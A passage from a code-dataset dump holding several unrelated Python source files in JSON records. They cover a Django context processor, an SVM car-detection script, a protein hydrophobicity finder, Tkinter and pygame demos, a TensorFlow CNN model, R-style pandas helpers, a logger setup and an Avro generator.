UserProfile\n\n\ndef datos_globales(request):\n\n    try:\n        profile = UserProfile.objects.get(user=request.user)\n        grupo = profile.get_grupo_display()\n    except Exception:\n        grupo = \"\"\n\n    contexto = {\n        'grupo': grupo\n    }\n\n    return contexto\n","sub_path":"hermespy/global_settings.py","file_name":"global_settings.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}{"seq_id":"601492163","text":"# -*- coding: utf-8 
-*-\r\n\"\"\"\r\nCreated on Mon May 15 22:36:12 2017\r\n\r\n@author: Anton Varfolomeev\r\n\"\"\"\r\n\r\nimport pickle\r\nimport cv2\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.image as mpimg\r\nimport os\r\nfrom skimage.feature import hog\r\n\r\nfrom extract_features import *\r\nfrom process_image import *\r\nimport time\r\n\r\n\r\n\r\nos.chdir('D:\\\\WORK\\\\CarND\\\\p5\\\\CarND-P5')\r\ntest_dir = './test_images/'\r\nout_dir = './out/'\r\n\r\n\r\n#%%\r\n\r\nimages = []\r\nfor entry in os.scandir(test_dir):\r\n if entry.is_file():\r\n print(entry.path)\r\n img = cv2.imread(entry.path)\r\n img = cv2.cvtColor(img,cv2.COLOR_BGR2RGB)\r\n images.append(img)\r\n\r\n\r\n#%%\r\n# Read in our vehicles and non-vehicles\r\n\r\ndef get_image_list(path):\r\n images = [os.path.join(dirpath, f)\r\n for dirpath, dirnames, files in os.walk(path)\r\n for f in files if f.endswith('.png')]\r\n return images\r\n \r\npath = 'e:/data/carnd/p5/'\r\ncars = get_image_list(path+'vehicles')\r\nnotcars = get_image_list(path+'non-vehicles')\r\n\r\nmyPath = 'e:/data/carnd/p5/my/'\r\nmyCars = get_image_list(myPath + 'Car')\r\nmyNotCars = get_image_list(myPath + 'NotCars')\r\n\r\n#%%\r\ncolorspace = 'HLS' # Can be RGB, HSV, LUV, HLS, YUV, YCrCb\r\norient = 11\r\npix_per_cell = 8\r\ncell_per_block = 2\r\nhog_channel = 'ALL' #(1,2) # Can be 0, 1, 2, or \"ALL\"\r\n\r\nt=time.time()\r\n\r\ncar_features = extract_features(cars, cspace=colorspace, orient=orient, \r\n pix_per_cell=pix_per_cell, cell_per_block=cell_per_block, \r\n hog_channel=hog_channel)\r\nnotcar_features = extract_features(notcars, cspace=colorspace, orient=orient, \r\n pix_per_cell=pix_per_cell, cell_per_block=cell_per_block, \r\n hog_channel=hog_channel)\r\nt2 = time.time()\r\nprint(round(t2-t, 2), 'Seconds to extract HOG features...')\r\n# Create an array stack of feature vectors\r\nX = np.vstack((car_features, notcar_features)).astype(np.float64) \r\n# Fit a per-column scaler\r\nX_scaler = StandardScaler().fit(X)\r\n# Apply the scaler to X\r\nscaled_X = X_scaler.transform(X).astype(np.float32)\r\n\r\n# Define the labels vector\r\ny = np.hstack((np.ones(len(car_features)), \r\n np.zeros(len(notcar_features)))).astype(np.int32)\r\n\r\n\r\n# Split up data into randomized training and test sets\r\nrand_state = np.random.randint(0, 100)\r\nX_train, X_test, y_train, y_test = train_test_split(\r\n scaled_X, y, test_size=0.2, random_state=rand_state)\r\n\r\nprint('Using:',orient,'orientations',pix_per_cell,\r\n 'pixels per cell and', cell_per_block,'cells per block')\r\nprint('Feature vector length:', len(X_train[0]))\r\n# Use a linear SVC \r\n\r\n\r\n#%% \r\n# Check the training time for the SVC\r\nuSvm = cv_svm (X_train, X_test, y_train, y_test)\r\n#%%\r\n# Check the prediction time for a single sample\r\n\r\nidx = np.arange(len(y_test))\r\nnp.random.shuffle(idx)\r\n\r\nt=time.time()\r\nn_predict = 1000\r\nyr = np.zeros(n_predict)\r\n\r\n#for i in range (n_predict):\r\nyr = uSvm.predict(X_test[idx[:n_predict]])[1].ravel()\r\nprint(sum( yr != y_test[idx[0:n_predict]]), \" mistakes from \", n_predict)\r\n#print('For these',n_predict, 'labels: ', y_test[0:n_predict])\r\nt2 = time.time()\r\nprint(round(t2-t, 5), 'Seconds to predict', n_predict,'labels with SVC')\r\n\r\n\r\n#%%\r\nt=time.time()\r\nmyCarFeatures = extract_features(myCars, cspace=colorspace, orient=orient, \r\n pix_per_cell=pix_per_cell, cell_per_block=cell_per_block, \r\n hog_channel=hog_channel)\r\nmyNotCarFeatures = extract_features(myNotCars, cspace=colorspace, 
orient=orient, \r\n pix_per_cell=pix_per_cell, cell_per_block=cell_per_block, \r\n hog_channel=hog_channel)\r\nt2 = time.time()\r\nprint(round(t2-t, 2), 'Seconds to extract HOG features...')\r\n# Create an array stack of feature vectors\r\nmyX = np.vstack((myCarFeatures, myNotCarFeatures)).astype(np.float64) \r\n# Fit a per-column scaler\r\nX_scaler = StandardScaler().fit(myX)\r\n# Apply the scaler to X\r\nscaled_X = X_scaler.transform(myX).astype(np.float32)\r\n\r\n# Define the labels vector\r\nmyY = np.hstack((np.ones(len(myCarFeatures)), \r\n np.zeros(len(myNotCarFeatures)))).astype(np.int32)\r\n\r\n\r\n# Split up data into randomized training and test sets\r\nrand_state = np.random.randint(0, 100)\r\nmyX_train, myX_test, myY_train, myY_test = train_test_split(\r\n scaled_X, myY, test_size=0.1, random_state=rand_state)\r\n#%%\r\nmySvm = cv_svm (myX_train, myX_test, myY_train, myY_test)\r\n\r\n# Check the score of the SVC\r\nprint('Test Accuracy of mySVC on my data = ', round(score(mySvm,myX_test, myY_test), 4))\r\nprint('Test Accuracy of uSVC on my data = ', round(score(uSvm,myX_test, myY_test), 4))\r\nprint('Test Accuracy of mySVC on u data = ', round(score(mySvm,X_test, y_test), 4))\r\nprint('Test Accuracy of uSVC on u data = ', round(score(uSvm,X_test, y_test), 4))\r\n\r\n#%%\r\nidx = np.arange(len(myY_test))\r\nnp.random.shuffle(idx)\r\n\r\nt=time.time()\r\nn_predict = 1000\r\nyr = uSvm.predict(myX_test[idx[0:n_predict]])[1].ravel()\r\n#print('For these',n_predict, 'labels: ', y_test[0:n_predict])\r\nt2 = time.time()\r\nprint(\"u on my\",sum( yr != myY_test[idx[0:n_predict]]), \" mistakes from \", n_predict)\r\nprint(round(t2-t, 5), 'Seconds to predict', n_predict,'labels with SVC')\r\n\r\nt=time.time()\r\nyr = mySvm.predict(myX_test[idx[0:n_predict]])[1].ravel()\r\n#print('For these',n_predict, 'labels: ', y_test[0:n_predict])\r\nt2 = time.time()\r\nprint(\"my on my\",sum( yr != myY_test[idx[0:n_predict]]), \" mistakes from \", n_predict)\r\nprint(round(t2-t, 5), 'Seconds to predict', n_predict,'labels with SVC')\r\n\r\n#%%\r\nunX_train = np.vstack((myX_train, X_train));\r\nunY_train = np.hstack((myY_train, y_train));\r\nunX_test = np.vstack((X_test, myX_test));\r\nunY_test = np.hstack((y_test, myY_test));\r\n\r\nfrom sklearn.utils import shuffle\r\n\r\nunX_train, unY_train = shuffle(unX_train, unY_train)\r\n\r\nunX_test, unY_test = shuffle(unX_test, unY_test)\r\n\r\n#%%\r\nunSvm = cv_svm (unX_train, unX_test, unY_train, unY_test)\r\n\r\nprint('Test Accuracy of unSvm on my data = ', round(score(unSvm,myX_test, myY_test), 4))\r\nprint('Test Accuracy of unSvm on u data = ', round(score(unSvm,X_test, y_test), 4))\r\n\r\n#%%\r\n#grid-search for optimal SVM parameters\r\n\r\nfrom sklearn import svm\r\nfrom sklearn.model_selection import GridSearchCV\r\nfrom sklearn.model_selection import RandomizedSearchCV\r\ndo_fit = False;\r\n\r\nif (do_fit):\r\n parameters = {'C': np.arange(0.5, 2.4, .1), 'gamma': np.arange(6.4e-4, 6.6e-4, 1e-5)}\r\n svr = svm.SVC()\r\n clf = GridSearchCV(svr, parameters)\r\n np.random.shuffle(idx)\r\n X_tr = unX_train[idx[:1000]]\r\n y_tr = unY_train[idx[:1000]]\r\n \r\n clf.fit(X_tr, y_tr)\r\n \r\n print(clf.best_params_, clf.best_score_)\r\n\r\n#%%-\r\nfrom moviepy.editor import VideoFileClip\r\n\r\nthr = 18\r\ntau = 0.95\r\nscales = [3, 4, 5]\r\nheat = np.zeros_like(img[:,:,0]).astype(np.float)\r\nscales = [3, 4, 5]\r\n\r\n \r\nvideo_output = 'out/p5C08sc%d_%.2f_%.1f.mp4' % (345, tau, thr)\r\nclip = VideoFileClip('project_video.mp4')#.subclip(30,45)\r\n#clip = 
VideoFileClip('E:\\\\Data\\\\USA\\\\Video\\\\cuts\\\\multiple_01.avi') \r\nfirst_clip = clip.fl_image(process_image)\r\nget_ipython().magic('time first_clip.write_videofile(video_output, audio=False)')\r\n\r\n\r\n","sub_path":"p5.py","file_name":"p5.py","file_ext":"py","file_size_in_byte":7223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"435123575","text":"from itertools import combinations\n\nN = int(input())\nS = list(input().split())\nK = int(input())\n\ncombos = list(combinations(S,K))\n\ntrue_count = 0\n\nfor element in combos:\n\tfound = False\n\tfor j in element:\n\t\tif j == 'a':\n\t\t\ttrue_count += 1\n\t\t\tfound = True\n\t\t\tbreak\n\nprint(\"{0:.4f}\".format( true_count/len(combos)))\n","sub_path":"Python/Itertools/IterablesAndIterators.py","file_name":"IterablesAndIterators.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"482779082","text":"import sys\nfrom translate import translate\n\n\"\"\"\nFirst element is three letter representation of amino acid\nSecond element: one letter representaion of amino acid\nThird element: kdHydrophobicity\nFourth element: wwHydrophobicity\nFifth element: hhHydrophobicity\n\"\"\"\n\nhydrophobicity = [\n (\"Ile\", \"I\", 4.5, 0.31, -0.60 ),\n (\"Val\", \"V\", 4.2, -0.07, -0.31),\n (\"Leu\", \"L\", 3.8, 0.56, -0.55),\n (\"Phe\", \"F\", 2.8, 1.13, -0.32),\n (\"Cys\", \"C\", 2.5, 0.24, -0.13),\n (\"Met\", \"M\", 1.9, 0.23, -0.10),\n (\"Ala\", \"A\", 1.8, -0.17, 0.11),\n (\"Gly\", \"G\", -0.4, -0.01, 0.74),\n (\"Thr\", \"T\", -0.7, -0.14, 0.52),\n (\"Ser\", \"S\", -0.8, -0.13, 0.84),\n (\"Trp\", \"W\", -0.9, 1.85, 0.30),\n (\"Tyr\", \"Y\", -1.3, 0.94, 0.68),\n (\"Pro\", \"P\", -1.6, -0.45, 2.23),\n (\"His\", \"H\", -3.2, -0.96, 2.06),\n (\"Glu\", \"E\", -3.5, -2.02, 2.68),\n (\"Gln\", \"Q\", -3.5, -0.58, 2.36),\n (\"Asp\", \"D\", -3.5, -1.23, 3.49),\n (\"Asn\", \"N\", -3.5, -1.23, 3.49),\n (\"Lys\", \"K\", -3.9, -0.99, 2.71),\n (\"Arg\", \"R\", -4.5, -0.81, 2.58)\n]\n\n\"\"\"\nget the total hydrophobicity given the region length\nprint out the regions that have high hydrophobicity\n@param aminoAcid \n@param minLen minimal length of region\n@param maxLen maximum length of region\n\"\"\"\ndef getHdyroRegion(aminoAcid, minLen, maxLen):\n acid = aminoAcid[0 : len(aminoAcid) - 4] # remove \"stop\" codon\n print(acid)\n results = [] #store potential region\n resultsIndex = [] #store region index\n preI = -999\n preLen = 0\n for i in range(0, len(acid) - minLen + 1): #loop through amino acid with given length\n for j in range(minLen, maxLen): #try different length of region: from min to max\n hydroSum = 0 \n if((i + j) < len(acid)): #aviod out of bound\n region = acid[i : i + j] #get subregion \n for k in range(0, j ): #sum up the hydro. \n hydroSum += getHydro(region[k])\n flag = (i - preI) >= preLen #the start index of second region should at least j away from the start of previous region\n if (hydroSum >= 45) and flag: # if the sum is greater than a critical value, then it is a transport potein \n results.append(region) # store subregion\n preLen = len(region)\n preI = i\n index = (i, i + j)\n resultsIndex.append(index)\n break #once find a high hydro. stop increasing the length of region \n else:\n continue #continue increase the size of region\n print(resultsIndex, end=\"\\n\")\n print(results, end=\"\\n\\n\") #print subregion. 
Will decide how to highlight the region\n\n\"\"\"\nget the individual hydrophobicity\n@param acid individual amino acid\n@return hhHydrophobicity by default\n\"\"\"\ndef getHydro(acid): #get individual hydrophobicity given an acid\n    for acidHydro in hydrophobicity:\n        if acid in acidHydro[1]: \n            return acidHydro[4]\n\n\n\ndef main(argv):\n\t\"\"\"\n\t\tGiven a FASTA file, translate from RNA to amino acids\n\t\t\n\t\tUsage:\n\t\tpython main.py fasta.txt\n\t\"\"\"\n\tif(len(argv) < 2):\n\t\tprint(\"Translates RNA sequences in a FASTA file into an amino acid sequence\")\n\t\tprint(\"Usage: python\", argv[0], \"fasta.txt\")\n\t\treturn\n\t\n\tfile = open(argv[1], \"r\")\n\tfor line in file:\n\t\tif line[0] == \">\":\n\t\t\tname = line[1:-1] #Omits the > and the newline character\n\t\t\tsequence = file.readline()[:-1] #Omits the newline character\n\t\t\tprint(name)\n\t\t\ttranslation = translate(sequence)\n            \n\t\t\tgetHdyroRegion(str(translation), 17, 22)\n            \n\t\t\t\nif __name__ == \"__main__\":\n\tmain(sys.argv)","sub_path":"getHydro.py","file_name":"getHydro.py","file_ext":"py","file_size_in_byte":3669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}{"seq_id":"281400088","text":"import datetime as dt\nfrom tkinter import *\n\nimport pymongo\n\n\ndef get_mongo():\n    global get_data\n    myclient = pymongo.MongoClient(\"mongodb://localhost:27017/\")\n    mydb = myclient[\"Sensor_Record\"]\n    mycol = mydb[\"data1\"]\n    for get_data in mycol.find({}, {\"_id\": 0, \"Sensor No\": 1}):\n        print(get_data)\n    return get_data\n\n\ndef drag_start(event):\n    widget = event.widget\n    widget.startX = event.x\n    widget.startY = event.y\n\n\ndef drag_motion(event):\n    widget = event.widget\n    x = widget.winfo_x() - widget.startX + event.x\n    y = widget.winfo_y() - widget.startY + event.y\n    widget.place(x=x, y=y)\n\n\ndef time_func():\n    time_data = dt.datetime.now().strftime('%Y-%m-%d %X')\n    return time_data\n\n\nroot = Tk()\nroot.title(\"DragTable\")\nroot.geometry(\"800x600\")\nroot.state('zoomed')\n\n# root.configure(bg='white')\n\n\nhello_button = Button(root, text=\"Hello\", pady=6)\n\nhello_button.pack()\n\nlabel = Label(root, bg=\"red\", width=8, height=4, text=time_func(), fg='blue', pady=10, padx=10, font=10)\nlabel.place(x=150, y=150)\n# label.config(text=print_func())\n\nlabel2 = Label(root, bg=\"blue\", width=8, height=4, text=\"BLUE\")\nlabel2.place(x=300, y=300)\n\nlabel3 = Label(root, bg=\"green\", width=8, height=4, text=\"GREEN\")\nlabel3.place(x=450, y=450)\n\nrectangle1 = Canvas(root, width=500, height=200)\nrectangle1.pack()\n\nrectangle1.create_rectangle(20, 140, 120, 180, fill=\"red\")\nrectangle1.create_text(70, 130, text=\"Projects--20%\")\nrectangle1.create_rectangle(140, 160, 240, 180, fill=\"blue\")\nrectangle1.create_text(190, 150, text=\"Quizzes--10%\")\nrectangle1.create_rectangle(260, 120, 360, 180, fill=\"green\")\nrectangle1.create_text(310, 110, text=\"Midterm--30%\")\nrectangle1.create_rectangle(380, 100, 480, 180, fill=\"orange\")\nrectangle1.create_text(430, 90, text=\"Final--40%\")\nrectangle1.create_line(0, 180, 500, 180)\n\nrect2 = Canvas(root, width=250, height=250)\nrect2.pack()\nrect2.create_rectangle(40, 180, 160, 220, fill=\"black\")\nrect2.create_text(70, 130, text=time_func())\n\nrectangle1.bind(\"<Button-1>\", drag_start)\nrectangle1.bind(\"<B1-Motion>\", drag_motion)\n\nrect2.bind(\"<Button-1>\", drag_start)\nrect2.bind(\"<B1-Motion>\", drag_motion)\n\nlabel.bind(\"<Button-1>\", drag_start)\nlabel.bind(\"<B1-Motion>\", drag_motion)\n\nlabel2.bind(\"<Button-1>\", 
drag_motion)\n\nlabel3.bind(\"<Button-1>\", drag_start)\nlabel3.bind(\"<B1-Motion>\", drag_motion)\n\nhello_button.bind(\"<Button-1>\", drag_start)\nhello_button.bind(\"<B1-Motion>\", drag_motion)\n\nget_mongo()\nroot.mainloop()\n","sub_path":"version4.py","file_name":"version4.py","file_ext":"py","file_size_in_byte":2506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}{"seq_id":"637784473","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n@author:\n    Lucas Yuki Imamura\n    Maria Fernanda Bittelbrunn Toniasso\n    Vitor Hugo Homem Marzarotto\n\"\"\"\nimport images\nfrom pygame.sprite import Sprite\nfrom core import RSurface\nimport pygame as pg\nimport math\nimport os\n\n\nclass GameObject(Sprite):\n    __bounce_dist = 30\n\n    def __init__(self, image_dict: dict, sound_dict: dict, ang: float,\n                 screen_size: tuple, vel=(0, 0), groups=None):\n        \"\"\"\n        Parameters\n        ----------\n        radius : float\n            Radius of the actor (for the bounding box).\n        image_dict : dict\n            Dictionary with the actor's sprites.\n        size : tuple\n            Size of the actor.\n        framerate : float\n            Number of frames per second\n        vel : TYPE, optional\n            Initial velocity. The default is (0, 0).\n        groups : TYPE, optional\n            Initial group. The default is None.\n        \"\"\"\n        self.__rect = pg.Rect(0, 0, 0, 0)\n        self.__center = [0, 0]\n\n        self.__image_dict = {key: self.load_img(\n            **args) for key, args in image_dict.items()}\n        self.vel = vel\n        self.ang = ang\n        self.__screen_size = screen_size\n\n        self.__state = list(self.__image_dict.keys())[0]\n        self.__image = self.__image_dict[self.__state]\n\n        self.state = self.__state\n\n        super().__init__(groups)\n\n        self.__new_angle = True\n        self.__moving = True\n        self.__savedgroup = groups\n\n    @property\n    def radius(self):\n        return self.__radius\n\n    @radius.setter\n    def radius(self, radius: float):\n        self.__radius = radius\n        self.__radius2 = radius*radius\n\n    @property\n    def radius2(self):\n        return self.__radius2\n\n    @property\n    def vel(self):\n        return self.__vel\n\n    @vel.setter\n    def vel(self, vel):\n        self.__vel = vel\n        if abs(self.__vel[0]) + abs(self.__vel[1]) > 0:\n            self.__moving = True\n        else:\n            self.__moving = False\n\n    @property\n    def ang(self):\n        return self.__ang\n\n    @ang.setter\n    def ang(self, ang):\n        self.__ang = ang\n        self.__new_angle = True\n        self.calc_angle_vector()\n\n    @property\n    def angle_vector(self):\n        return self.__angle_vector\n\n    def calc_angle_vector(self):\n        ang = math.radians(self.ang)\n        self.__angle_vector = (math.cos(ang), -math.sin(ang))\n\n    @property\n    def screen_size(self):\n        return self.__screen_size\n\n    @property\n    def rect(self):\n        return self.__rect\n\n    @rect.setter\n    def rect(self, position):\n        self.__rect.x = position[0]\n        self.__rect.y = position[1]\n\n    @property\n    def center(self):\n        return self.__center\n\n    @center.setter\n    def center(self, pos: list):\n        try:\n            pos = list(pos)\n            assert len(pos) == 2\n        except (TypeError, AssertionError) as e:\n            print(\"'pos' must be an iterable with x in the first\" +\n                  \"position and y in the second\")\n            raise e\n\n        self.__center = pos\n        self.__centralize_image()\n\n    @property\n    def image(self):\n        return self.__image\n\n    @property\n    def state(self):\n        return self.__state\n\n    @state.setter\n    def state(self, new_state):\n        self.__state = new_state\n        self.__image = self.__image_dict[self.__state]\n\n        self.__centralize_image()\n        self.radius = self.__image.radius\n\n        self.__lim_x_inf = self.__radius + self.__bounce_dist\n        self.__lim_y_inf = self.__radius + self.__bounce_dist\n        temp = self.__radius + self.__bounce_dist\n        self.__lim_x_sup = 
self.__screen_size[0] - temp\n        self.__lim_y_sup = self.__screen_size[1] - temp\n\n    @property\n    def lim_x_inf(self):\n        return self.__lim_x_inf\n\n    @property\n    def lim_y_inf(self):\n        return self.__lim_y_inf\n\n    @property\n    def lim_x_sup(self):\n        return self.__lim_x_sup\n\n    @property\n    def lim_y_sup(self):\n        return self.__lim_y_sup\n\n    def load_img(self, R=None, path=None, size=None, image=None):\n\n        if image is not None:\n            return image\n\n        superficie = RSurface(R, size, pg.SRCALPHA)\n\n        image = pg.image.load(path)\n        image.set_colorkey((255, 255, 255))\n        image = image.convert_alpha()\n        image = pg.transform.scale(image, size)\n        superficie.blit(image, (0, 0))\n        return superficie\n\n    def revive(self):\n        for g in self.__savedgroup:\n            g.add(self)\n\n    def __centralize_image(self):\n        img_size = self.__image.get_size()\n        h_size = (img_size[0]/2, img_size[1]/2,)\n        self.__rect.update(self.__center[0]-h_size[0],\n                           self.__center[1]-h_size[1],\n                           *img_size)\n\n    def __rotate(self):\n        self.__image = pg.transform.rotate(self.__image_dict[self.state],\n                                           self.ang)\n        self.__centralize_image()\n        self.__new_angle = False\n\n    def move(self, x, y):\n        self.__center[0] += x\n        self.__center[1] += y\n\n        # improve later by mirroring the excess\n        if self.__center[0] < self.lim_x_inf:\n            self.__center[0] = self.lim_x_inf\n            self.vel = (-self.vel[0], self.vel[1])\n        elif self.__center[0] > self.lim_x_sup:\n            self.__center[0] = self.lim_x_sup\n            self.vel = (-self.vel[0], self.vel[1])\n\n        # improve later by mirroring the excess\n        if self.__center[1] < self.lim_y_inf:\n            self.__center[1] = self.lim_y_inf\n            self.vel = (self.vel[0], -self.vel[1])\n        elif self.__center[1] > self.lim_y_sup:\n            self.__center[1] = self.lim_y_sup\n            self.vel = (self.vel[0], -self.vel[1])\n\n        self.__centralize_image()\n\n    def update(self, dt):\n        \"\"\"\n        Parameters\n        ----------\n        new_pos : TYPE, optional\n            Force a new position for the actor; if nothing is passed, it is\n            calculated from the old position and the current velocity.\n            The default is None.\n\n        Returns\n        -------\n        new_pos: tuple\n            New position of the actor.\n\n        \"\"\"\n        if self.__moving:\n            self.move(*self.vel)\n\n        if self.__new_angle:\n            self.__rotate()\n","sub_path":"core/GameObject.py","file_name":"GameObject.py","file_ext":"py","file_size_in_byte":6329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}{"seq_id":"278259892","text":"import tensorflow as tf\nimport numpy as np\n\nclass CNN_LSTM:\n    \n    def __init__(self,x,weights,biases,num_filters):\n        self.x = x \n        self.weights = weights\n        self.biases = biases\n        self.num_filters = num_filters\n\n    def CNN_(self):\n        x = tf.transpose(self.x,[0,2,1])\n        print(x.get_shape)\n        conv1 = tf.nn.conv1d(x,self.weights['conv1'],1,'SAME')\n        conv1 = tf.nn.bias_add(conv1,self.biases['conv1'])\n        conv1 = tf.keras.layers.BatchNormalization()(conv1)\n        conv1 = tf.nn.relu(conv1)\n        print(np.array(conv1))\n        # Second convolution layer\n        conv2 = tf.nn.conv1d(conv1,self.weights['conv2'],1,'SAME')\n        conv2 = tf.nn.bias_add(conv2,self.biases['conv2'])\n        conv2 = tf.keras.layers.BatchNormalization()(conv2)\n        conv2 = tf.nn.relu(conv2)\n        print(np.array(conv2))\n        # Third convolution layer\n        conv3 = tf.nn.conv1d(conv2,self.weights['conv3'],1,'SAME')\n        conv3 = tf.nn.bias_add(conv3,self.biases['conv3'])\n        conv3 = tf.keras.layers.BatchNormalization()(conv3)\n        conv3 = tf.nn.relu(conv3)\n        print(np.array(conv3))\n        # Fourth layer\n        conv4 = tf.nn.conv1d(conv3,self.weights['conv4'],1,'SAME')\n        conv4 = tf.nn.bias_add(conv4,self.biases['conv4'])\n        conv4 = tf.keras.layers.BatchNormalization()(conv4)\n        conv4 = 
tf.nn.relu(conv4)\n        print(np.array(conv4))\n        # Fifth layer\n        conv5 = tf.nn.conv1d(conv4,self.weights['conv5'],1,'SAME')\n        conv5 = tf.nn.bias_add(conv5,self.biases['conv5'])\n        conv5 = tf.keras.layers.BatchNormalization()(conv5)\n        conv5 = tf.nn.relu(conv5)\n        print(np.array(conv5))\n\n        conv6 = tf.nn.conv1d(conv5,self.weights['conv6'],1,'SAME')\n        conv6 = tf.nn.bias_add(conv6,self.biases['conv6'])\n        conv6 = tf.keras.layers.BatchNormalization()(conv6)\n        conv6 = tf.nn.relu(conv6)\n        print(np.array(conv6))\n\n        conv7 = tf.nn.conv1d(conv6,self.weights['conv7'],1,'SAME')\n        conv7 = tf.nn.bias_add(conv7,self.biases['conv7'])\n        conv7 = tf.keras.layers.BatchNormalization()(conv7)\n        conv7 = tf.nn.relu(conv7)\n        print(np.array(conv7))\n        # Eighth layer\n        conv8 = tf.nn.conv1d(conv7,self.weights['conv8'],1,'SAME')\n        conv8 = tf.nn.bias_add(conv8,self.biases['conv8'])\n        conv8 = tf.keras.layers.BatchNormalization()(conv8)\n        conv8 = tf.nn.relu(conv8)\n        print(np.array(conv8))\n\n        conv9 = tf.nn.conv1d(conv8,self.weights['conv9'],1,'SAME')\n        conv9 = tf.nn.bias_add(conv9,self.biases['conv9'])\n        conv9 = tf.keras.layers.BatchNormalization()(conv9)\n        conv9 = tf.nn.relu(conv9)\n        print(np.array(conv9))\n        conv9 = tf.keras.layers.GlobalAveragePooling1D()(conv9)\n        return conv9\n\n    def LSTM_(self):\n        cnn_out = self.CNN_()\n        lstm = tf.keras.layers.LSTM(self.num_filters)(cnn_out)\n        return lstm\n\n    def Return_out(self):\n        # lstm_out = self.LSTM_()\n        cnn_out = self.CNN_()\n        return_out = tf.add(tf.matmul(cnn_out,self.weights['out_w']),self.biases['out_b'])\n\n        return return_out","sub_path":"FCN_LSTM/C-LSTM/cnn_lstm_model9.py","file_name":"cnn_lstm_model9.py","file_ext":"py","file_size_in_byte":3126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}{"seq_id":"354630299","text":"import logging\nimport logging.handlers\n\n_LOG_FMT = '%(asctime)s %(levelname)s [%(filename)s:%(lineno)d] %(message)s'\n\nlogger = logging.getLogger('i3-workspace-groups')\n\ndef init_logger(name: str) -> None:\n    syslog_handler = logging.handlers.SysLogHandler(address='/dev/log')\n    stdout_handler = logging.StreamHandler()\n    stdout_formatter = logging.Formatter(_LOG_FMT)\n    stdout_handler.setFormatter(stdout_formatter)\n    syslog_formatter = logging.Formatter('{}: {}'.format(name, _LOG_FMT))\n    syslog_formatter.ident = name\n    syslog_handler.setFormatter(syslog_formatter)\n    logger.addHandler(syslog_handler)\n    logger.addHandler(stdout_handler)\n","sub_path":"i3wsgroups/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}{"seq_id":"130963803","text":"\"\"\"Some functions from R-base\n\nIf a function uses DataFrame/DataFrameGroupBy as first argument, it may be\nregistered by `register_verb` and should be placed in `./verbs.py`\n\"\"\"\nimport itertools\nfrom typing import Any, Iterable, Optional\n\nimport pandas\nfrom pandas import Categorical, DataFrame\nfrom pipda import register_func\n\nfrom ..core.middlewares import WithDataEnv\nfrom ..core.types import NumericType\nfrom ..core.contexts import Context\n\n@register_func(None, context=Context.EVAL)\ndef cut(\n    x: Iterable[NumericType],\n    breaks: Any,\n    labels: Optional[Iterable[Any]] = None,\n    include_lowest: bool = False,\n    right: bool = True,\n    precision: int = 2,\n    ordered_result: bool = False\n) -> Categorical:\n    \"\"\"Divides the range of x into intervals and codes the values in x\n    according to which interval they fall. 
The leftmost interval corresponds\n to level one, the next leftmost to level two and so on.\n\n Args:\n x: a numeric vector which is to be converted to a factor by cutting.\n breaks: either a numeric vector of two or more unique cut points or\n a single number (greater than or equal to 2) giving the number of\n intervals into which x is to be cut.\n labels: labels for the levels of the resulting category. By default,\n labels are constructed using \"(a,b]\" interval notation.\n If labels = False, simple integer codes are returned instead\n of a factor.\n include_lowest: bool, indicating if an ‘x[i]’ equal to the lowest\n (or highest, for right = FALSE) ‘breaks’ value should be included.\n right: bool, indicating if the intervals should be closed on the right\n (and open on the left) or vice versa.\n precision:integer which is used when labels are not given. It determines\n the precision used in formatting the break numbers. Note, this\n argument is different from R's API, which is dig.lab.\n ordered_result: bool, should the result be an ordered categorical?\n\n Returns:\n A categorical object with the cuts\n \"\"\"\n if labels is None:\n ordered_result = True\n\n return pandas.cut(\n x,\n breaks,\n labels=labels,\n include_lowest=include_lowest,\n right=right,\n precision=precision,\n ordered=ordered_result\n )\n\n@register_func(None, context=Context.EVAL)\ndef identity(x: Any) -> Any:\n \"\"\"Return whatever passed in\n\n Expression objects are evaluated using parent context\n \"\"\"\n return x\n\n@register_func(None, context=Context.EVAL)\ndef expandgrid(*args: Iterable[Any], **kwargs: Iterable[Any]) -> DataFrame:\n \"\"\"Expand all combinations into a dataframe. R's `expand.grid()`\"\"\"\n iters = {}\n for i, arg in enumerate(args):\n name = getattr(\n arg,\n 'name',\n getattr(arg, '__name__', f'Var{i}')\n )\n iters[name] = arg\n iters.update(kwargs)\n\n return DataFrame(\n list(itertools.product(*iters.values())),\n columns=iters.keys()\n )\n\n# ---------------------------------\n# Plain functions\n# ---------------------------------\n\ndef data_context(data: DataFrame) -> Any:\n \"\"\"Evaluate verbs, functions in the\n possibly modifying (a copy of) the original data.\n\n It mimic the `with` function in R, but you have to write it in a python way,\n which is using the `with` statement. 
And you have to use it with `as`, since\n we need the value returned by `__enter__`.\n\n Args:\n data: The data\n func: A function that is registered by\n `pipda.register_verb` or `pipda.register_func`.\n *args: Arguments for func\n **kwargs: Keyword arguments for func\n\n Returns:\n The original or modified data\n \"\"\"\n return WithDataEnv(data)\n","sub_path":"datar/base/funs.py","file_name":"funs.py","file_ext":"py","file_size_in_byte":3848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"647118750","text":"\nimport json\nimport os\nimport six\nfrom avro import schema\n\nif six.PY3:\n from io import StringIO\nelse:\n from cStringIO import StringIO\n\n\nif six.PY3:\n from avro.schema import SchemaFromJSONData as make_avsc_object\nelse:\n from avro.schema import make_avsc_object\n\nfrom .core_writer import generate_namespace_modules, clean_fullname\nfrom .tabbed_writer import TabbedWriter\nfrom .core_writer import write_preamble, start_namespace, write_schema_record, write_enum, write_read_file\nfrom .core_writer import write_get_schema, write_reader_impl\nimport logging\n\nlogger = 